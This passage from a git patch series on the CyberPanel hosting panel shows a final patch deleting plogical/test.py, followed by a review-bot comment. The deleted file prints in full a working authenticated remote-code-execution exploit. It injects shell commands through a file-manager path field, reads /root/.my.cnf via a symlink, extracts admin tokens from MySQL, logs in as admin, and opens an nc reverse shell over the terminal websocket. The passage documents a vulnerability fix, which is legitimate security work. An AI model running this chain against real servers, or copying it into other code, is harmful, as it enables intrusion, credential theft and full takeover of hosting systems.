'csrftoken={};sessionid={}'.format(token, + session_hand_login["sessionid"]), + 'Referer': target + } + + get_websocket_token = session.get(target + "/Terminal", headers=headers, verify=False) + verifyPath = \ + re.findall('id=\"verifyPath\">(.*?)', str(get_websocket_token.content))[-1] + socket_password = \ + 
re.findall('id=\"password\">(.*?)', str(get_websocket_token.content))[-1] + print("[+] verifyPath {}".format(verifyPath)) + print("[+] socketPassword {}".format(socket_password)) + print("[+] Trying to connect to socket") + ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), + on_open=on_open, + on_close=on_close) + ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) + + else: + print("[-] Auto admin login failed") + else: + print(read_file) + else: + print("[-] Unexpected") + else: + print("[-] Username selected failed") + else: + print("[-] Fail ssh pub") + else: + print("[-] List error") + else: + print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) + + +if __name__ == "__main__": + init() \ No newline at end of file From be9f5d762029522616c1453ccf5b5a8ba97ab191 Mon Sep 17 00:00:00 2001 From: Usman Nasir Date: Sun, 29 Aug 2021 19:48:14 +0500 Subject: [PATCH 4/4] resolve https://www.exploit-db.com/exploits/50230 --- plogical/test.py | 233 ----------------------------------------------- 1 file changed, 233 deletions(-) diff --git a/plogical/test.py b/plogical/test.py index 88ad1362c..e69de29bb 100644 --- a/plogical/test.py +++ b/plogical/test.py 
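Review bot: `plogical/test.py` as added here is the published proof-of-concept for the issue rather than a test: it has no assertions, depends on `requests` and `websocket`, and turns off certificate verification to talk to a live host. Committing it under the application tree would ship a working attack script with the panel, and PATCH 4/4 removes it only from the tip, not from the repository history. A regression test that passes a `completeStartingPath` value containing shell metacharacters through `secMiddleware` and asserts that the request is rejected would pin the fix without carrying the script.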
@@ -1,233 +0,0 @@ -# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) -# Date: 27.08.2021 -# Author: Numan Türle -# Vendor Homepage: https://cyberpanel.net/ -# Software Link: https://github.com/usmannasir/cyberpanel -# Version: <=2.1 -# https://www.youtube.com/watch?v=J_8iLELVgkE - - -# !/usr/bin/python3 -# -*- coding: utf-8 -*- -# CyberPanel - Remote Code Execution (Authenticated) -# author: twitter.com/numanturle -# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] -# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password - - -import argparse, requests, warnings, json, re, base64, websocket, ssl, _thread, time -from requests.packages.urllib3.exceptions import InsecureRequestWarning -from cmd import Cmd - -warnings.simplefilter('ignore', InsecureRequestWarning) - - -def init(): - parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') - parser.add_argument('-u', '--host', help='Host', type=str, required=True) - parser.add_argument('-l', '--login', help='Username', type=str, required=True) - parser.add_argument('-p', '--password', help='Password', type=str, required=True) - parser.add_argument('-f', '--file', help='File', type=str) - args = parser.parse_args() - exploit(args) - - -def exploit(args): - def on_open(ws): - verifyPath, socket_password - print("[+] Socket connection successful") - print("[+] Trying a reverse connection") - ws.send(json.dumps({"tp": "init", "data": {"verifyPath": verifyPath, "password": socket_password}})) - ws.send(json.dumps( - {"tp": "client", "data": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r", - "verifyPath": verifyPath, "password": socket_password})) - ws.close() - - def on_close(ws, close_status_code, close_msg): - print("[+] Successful") - print("[!] 
Disconnect from socket") - - session = requests.Session() - target = "https://{}:8090".format(args.host) - username = args.login - password = args.password - - print("[+] Target {}".format(target)) - - response = session.get(target, verify=False) - session_hand = session.cookies.get_dict() - token = session_hand["csrftoken"] - - print("[+] Token {}".format(token)) - - headers = { - 'X-Csrftoken': token, - 'Cookie': 'csrftoken={}'.format(token), - 'Referer': target - } - - login = session.post(target + "/verifyLogin", headers=headers, verify=False, - json={"username": username, "password": password, "languageSelection": "english"}) - login_json = json.loads(login.content) - - if login_json["loginStatus"]: - session_hand_login = session.cookies.get_dict() - - print("[+] Login Success") - print("[+] Send request fetch websites list") - - headers = { - 'X-Csrftoken': session_hand_login["csrftoken"], - 'Cookie': 'csrftoken={};sessionid={}'.format(token, session_hand_login["sessionid"]), - 'Referer': target - } - - feth_weblist = session.post(target + "/websites/fetchWebsitesList", headers=headers, verify=False, - json={"page": 1, "recordsToShow": 10}) - feth_weblist_json = json.loads(feth_weblist.content) - - if feth_weblist_json["data"]: - - weblist_json = json.loads(feth_weblist_json["data"]) - domain = weblist_json[0]["domain"] - domain_folder = "/home/{}".format(domain) - - print("[+] Successfully {} selected".format(domain)) - print("[+] Creating ssh pub") - - remove_ssh_folder = session.post(target + "/filemanager/controller", headers=headers, verify=False, - json={"path": domain_folder, "method": "deleteFolderOrFile", - "fileAndFolders": [".ssh"], "domainRandomSeed": "", - "domainName": domain, "skipTrash": 1}) - create_ssh = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, - json={"domain": domain, "folder": "{}".format(domain_folder)}) - create_ssh_json = json.loads(create_ssh.content) - - if create_ssh_json["status"]: - key 
= create_ssh_json["deploymentKey"] - - print("[+] Key : {}".format(key)) - - explode_key = key.split() - explode_username = explode_key[-1].split("@") - - if explode_username[0]: - username = explode_username[0] - hostname = explode_username[1] - - print("[+] {} username selected".format(username)) - print("[+] Preparing for symlink attack") - print("[+] Attempting symlink attack with user-level command execution vulnerability #1") - - target_file = args.file - if not target_file: - target_file = "/root/.my.cnf" - domain_folder_ssh = "{}/.ssh".format(domain_folder) - command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh, username, target_file, - domain_folder_ssh, username) - - completeStartingPath = "{}';{};'".format(domain_folder, command) - print('complete starting path: %s' % completeStartingPath) - time.sleep(5) - # filemanager/controller - completeStartingPath - command execution vulnerability - - symlink = session.post(target + "/filemanager/controller", headers=headers, verify=False, - json={"completeStartingPath": completeStartingPath, "method": "listForTable", - "home": domain_folder, "domainRandomSeed": "", "domainName": domain}) - symlink_json = json.loads(symlink.content) - - if symlink_json["status"]: - print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) - - read_file = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, - json={"domain": domain, "folder": "{}".format(domain_folder)}) - read_file_json = json.loads(read_file.content) - read_file = read_file_json["deploymentKey"] - if not args.file: - print("-----------------------------------") - print(read_file.strip()) - print("-----------------------------------") - - mysql_password = re.findall('password=\"(.*?)\"', read_file)[0] - steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format( - mysql_password, domain_folder) - - 
print("[+] Fetching users tokens") - - completeStartingPath = "{}';{}".format(domain_folder, steal_token) - steal_token_request = session.post(target + "/filemanager/controller", headers=headers, - verify=False, - json={"completeStartingPath": completeStartingPath, - "method": "listForTable", "home": domain_folder, - "domainRandomSeed": "", "domainName": domain}) - token_file = domain_folder + "/token.txt" - steal_token_read_request = session.post(target + "/filemanager/controller", headers=headers, - verify=False, json={"fileName": token_file, - "method": "readFileContents", - "domainRandomSeed": "", - "domainName": domain}) - leak = json.loads(steal_token_read_request.content) - leak = leak["fileContents"].replace("Basic ", "").strip().split("\n")[1:] - print("------------------------------") - for user in leak: - b64de = base64.b64decode(user).decode('utf-8') - exp_username = b64de.split(":") - if exp_username[0] == "admin": - admin_password = exp_username[1] - print("[+] " + b64de) - print("------------------------------") - print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") - print("[+] Try login admin") - - headers = { - 'X-Csrftoken': token, - 'Cookie': 'csrftoken={}'.format(token), - 'Referer': target - } - login_admin = session.post(target + "/verifyLogin", headers=headers, verify=False, - json={"username": "admin", "password": admin_password, - "languageSelection": "english"}) - login_json = json.loads(login_admin.content) - if login_json["loginStatus"]: - session_hand_login = session.cookies.get_dict() - - print("[+] 4dm1n_l061n_5ucc355") - print("[+] c0nn3c71n6_70_73rm1n4l") - headers = { - 'X-Csrftoken': session_hand_login["csrftoken"], - 'Cookie': 'csrftoken={};sessionid={}'.format(token, - session_hand_login["sessionid"]), - 'Referer': target - } - - get_websocket_token = session.get(target + "/Terminal", headers=headers, verify=False) - verifyPath = \ - re.findall('id=\"verifyPath\">(.*?)', str(get_websocket_token.content))[-1] - socket_password = \ - 
re.findall('id=\"password\">(.*?)', str(get_websocket_token.content))[-1] - print("[+] verifyPath {}".format(verifyPath)) - print("[+] socketPassword {}".format(socket_password)) - print("[+] Trying to connect to socket") - ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), - on_open=on_open, - on_close=on_close) - ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) - - else: - print("[-] Auto admin login failed") - else: - print(read_file) - else: - print("[-] Unexpected") - else: - print("[-] Username selected failed") - else: - print("[-] Fail ssh pub") - else: - print("[-] List error") - else: - print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) - - -if __name__ == "__main__": - init() \ No newline at end of file